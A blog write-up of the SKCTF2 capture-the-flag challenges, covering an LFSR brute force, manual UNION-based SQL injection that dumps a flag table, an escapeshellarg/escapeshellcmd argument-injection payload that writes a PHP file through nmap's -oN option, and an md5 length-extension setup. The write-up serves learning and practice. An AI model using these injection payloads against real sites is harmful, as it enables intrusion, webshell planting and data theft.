V0W's Blog

SKCTF2

Word count: 1,133; reading time: 6 min
2018/04/21

SKCTF internal CTF 2


NOT GET Score

Crypto-Streamgame1

For this challenge I thought of brute-forcing, but unfortunately I got the script wrong, and on top of the frustration from the challenges I couldn't solve earlier, I didn't get it. Felt terrible...

Analysis

The encryption process is given:

```python
from flag import flag
assert flag.startswith("flag{")
assert flag.endswith("}")
assert len(flag)==25

def lfsr(R,mask):
    output = (R << 1) & 0xffffff
    i=(R&mask)&0xffffff
    lastbit=0
    while i!=0:          # lastbit = parity of the masked state bits
        lastbit^=(i&1)
        i=i>>1
    output^=lastbit
    return (output,lastbit)

R=int(flag[5:-1],2) # the flag body is 19 characters of '0'/'1'; read it as a binary integer (the initial state)
mask = 0b1010011000100011100 # feedback mask

f=open("key","ab") # ab: binary append mode (Python 2: chr() yields a one-byte str)
for i in range(12):
    tmp=0
    for j in range(8):
        (R,out)=lfsr(R,mask) # the internals of the encryption do not actually matter for the solve
        tmp=(tmp << 1)^out
    f.write(chr(tmp))
f.close()
```

We need to simulate the encryption process. Since the plaintext is 19 bits and each bit is 0 or 1, the simulation needs at most 2**19 attempts.

```python
def lfsr(R, mask):
    output = (R << 1) & 0xffffff
    i = (R & mask) & 0xffffff
    lastbit = 0
    while i != 0:
        lastbit ^= (i & 1)
        i = i >> 1
    output ^= lastbit
    return (output, lastbit)

mask = 0b1010011000100011100

with open("key", "rb") as f:
    c = f.read()  # read the 12-byte key as bytes (Python 3: c[i] is an int)

# The plaintext is 19 bits, so the initial state is one of 2**19 values.
for count in range(2**19):
    R = count
    for i in range(12):
        tmp = 0
        for j in range(8):
            (R, out) = lfsr(R, mask)
            tmp = (tmp << 1) ^ out
        if tmp != c[i]:  # compare each simulated byte with the corresponding key byte
            break
    else:
        # only reached when all 12 bytes matched (a mismatch on the 12th byte
        # would also leave i == 11, so checking `if i == 11` alone is not enough)
        print('flag{%s}' % format(count, '019b'))  # keep leading zeros: the flag body is 19 bits
        break
```

flag{1110101100001101011}

web-SQLinjection

Looking back, this challenge is actually quite simple; I overthought it. From the source I could see the captcha was simply obtained by an md5 collision, but I assumed the captcha would keep changing ==, so I set this challenge aside.
My biggest gain today was learning to write an md5 collision script (quite a few challenges involve this ==,).
getmd5

```python
import hashlib

def getmd5(code):
    # Brute-force a small integer whose md5 hex digest starts with the given
    # 4-character prefix (the captcha check only compares the first 4 hex digits).
    for i in range(9999):
        temp = hashlib.md5(str(i).encode()).hexdigest()
        if temp[0:4] == code:
            return i
    return None  # no match in range; widen the search if this happens

print(getmd5('084a'))

#-1' union select 1,2,database()#
#-1' union select 1,2,group_concat(TABLE_NAME) from information_schema.TABLES where table_schema='security' #
#-1' union select 1,2,group_concat(COLUMN_NAME) from information_schema.COLUMNS where table_schema='security' && table_name='f1ag'#
#-1' union select 1,2,group_concat(id,'|',flagg) from f1ag #
```

Manual SQL injection

```sql
-1' union select 1,2,3 #
```
Columns 2 and 3 are echoed, column 1 is not (three columns in total).

```sql
-1' union select 1,2,database()#
```
security

```sql
-1' union select 1,2,group_concat(TABLE_NAME) from information_schema.TABLES where table_schema='security' #
```

Your Login name:2
Your Password:emails,f1ag,referers,uagents,users

```sql
-1' union select 1,2,group_concat(COLUMN_NAME) from information_schema.COLUMNS where table_schema='security' && table_name='f1ag'#
```

Your Login name:2
Your Password:id,flagg

```sql
-1' union select 1,2,group_concat(id,'|',flagg) from f1ag #
```

Your Login name:2
Your Password:1|skctf{SQL_injection_md5}

web-nmap

Source:

```php
<?php
include("flag.php");
if(!isset($_GET['host'])){
    highlight_file(__FILE__);
}else{
    $host =(string)$_GET['host'];
    $host=escapeshellarg($host); # filtering is applied, but it can be bypassed
    $host=escapeshellcmd($host); # this second pass is what lets a ' escape
    $sandbox = md5("box".$_SERVER['REMOTE_ADDR']);
    echo "you are in sandbox: ".$sandbox."<br/>";
    @mkdir($sandbox);
    chdir($sandbox);
    echo "<pre>";
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
    echo "</pre>";
}
?>
```

Test code:

```php
<?php
$host = "' <?php phpinfo();?> -oN shell.php '";
$host = (string)$host;
echo "host:".$host;
echo "</br>"."\n";
$arg = escapeshellarg($host);
echo "arg:".$arg;
echo "</br>"."\n";
$cmd = escapeshellcmd($arg);
echo "cmd:".$cmd;
echo "</br>"."\n";
?>
```

For a single, unpaired single quote, escapeshellarg() escapes it and additionally adds a single quote on each side, whereas escapeshellcmd() simply prefixes it with one escape character (a backslash).
For a pair of single quotes, escapeshellcmd() does not escape them by default, but escapeshellarg() does.
Passing the host parameter through escapeshellarg() first and then escapeshellcmd() is what causes the problem.
escapeshellarg first escapes the single quote and then introduces a pair of single quotes around it; escapeshellcmd does not escape the paired single quotes, but it does escape the escape character \. As a result the escape character loses its effect and a single quote escapes.

In the last line of the test output you can see \\, which neutralises the escape character and lets the single quote escape.

payload: ?host=' <?php phpinfo();?> -oN shell.php '
Visit the sandbox directory to see the file that was written.
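To make the interaction between the two functions concrete, here is an added example (not code from the original post) that ports PHP's POSIX escapeshellarg()/escapeshellcmd() to Python following the manual's rules, feeds them the host string from the test code above, and uses shlex to show what argv nmap actually receives in each ordering; a single escapeshellarg() keeps the whole value as one opaque argument, while escapeshellcmd() applied afterwards splits it into separate words:

```python
import shlex

# Python ports of PHP's POSIX escapeshellarg()/escapeshellcmd() (added here,
# not code from the original post), following the PHP manual's rules.
SHELLCMD_SPECIAL = set('#&;`|*?~<>^()[]{}$\\\n\xff')

def php_escapeshellarg(s):
    # Wrap in single quotes; each embedded ' becomes '\'' (close, literal ', reopen).
    return "'" + s.replace("'", "'\\''") + "'"

def php_escapeshellcmd(s):
    # Backslash-escape shell metacharacters; a quote is escaped only when it is
    # unpaired (PHP looks ahead for a partner quote of the same kind).
    out = []
    pending = None  # kind of quote currently waiting for its closing partner
    for i, ch in enumerate(s):
        if ch in "'\"":
            if pending is None and ch in s[i + 1:]:
                pending = ch      # opening quote with a partner later: left alone
            elif pending == ch:
                pending = None    # the closing partner: left alone
            else:
                out.append('\\')  # unpaired (or a different nested quote): escaped
        elif ch in SHELLCMD_SPECIAL:
            out.append('\\')
        out.append(ch)
    return ''.join(out)

def nmap_argv(host, double_escape):
    """argv the shell would hand to nmap after PHP escaping (shlex models POSIX sh)."""
    arg = php_escapeshellarg(host)
    if double_escape:
        arg = php_escapeshellcmd(arg)  # the challenge's ordering: cmd() after arg()
    return shlex.split("nmap -F " + arg)

# Constructed input: the host string from the test code above.
HOST = "' <?php phpinfo();?> -oN shell.php '"

if __name__ == "__main__":
    print("escapeshellarg only:", nmap_argv(HOST, False))  # one opaque argument
    print("arg then cmd:       ", nmap_argv(HOST, True))   # -oN and shell.php become separate words
```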

Reference link
https://paper.seebug.org/164/#0-tsina-1-56231-397232819ff9a47a7b7e80a40613cfe1

web-md5 length extension attack

A Vim swap file leaks the source: http://192.168.211.105:8001/.index.php.swp

Source obtained:

```php
$flag = "xxxxxxxx";
$secret = "xxxxxxxxxxxxxxxxxxxxxxxxx"; // This secret is 15 characters long for security!
$username = $_POST["username"];
$password = $_POST["password"];
if (!empty($_COOKIE["getmein"])) {
    if (urldecode($username) === "admin" && urldecode($password) != "admin") {
        if ($_COOKIE["getmein"] == md5($secret . urldecode($username . $password))) {
            echo "Congratulations! You are a registered user.\n";
            die ("The flag is ". $flag);
        }
        else {
            die ("Your cookies don't match up! STOP HACKING THIS SITE.");
        }
    }
    else {
        die ("You are not an admin! LEAVE.");
    }
}
setcookie("sample-hash", md5($secret . urldecode("admin" . "admin")), time() + (60 * 60 * 24 * 7));
echo "<h1>hello ctfer!<h1>";
```

The challenge provides sample-hash = MD5($secret."adminadmin")
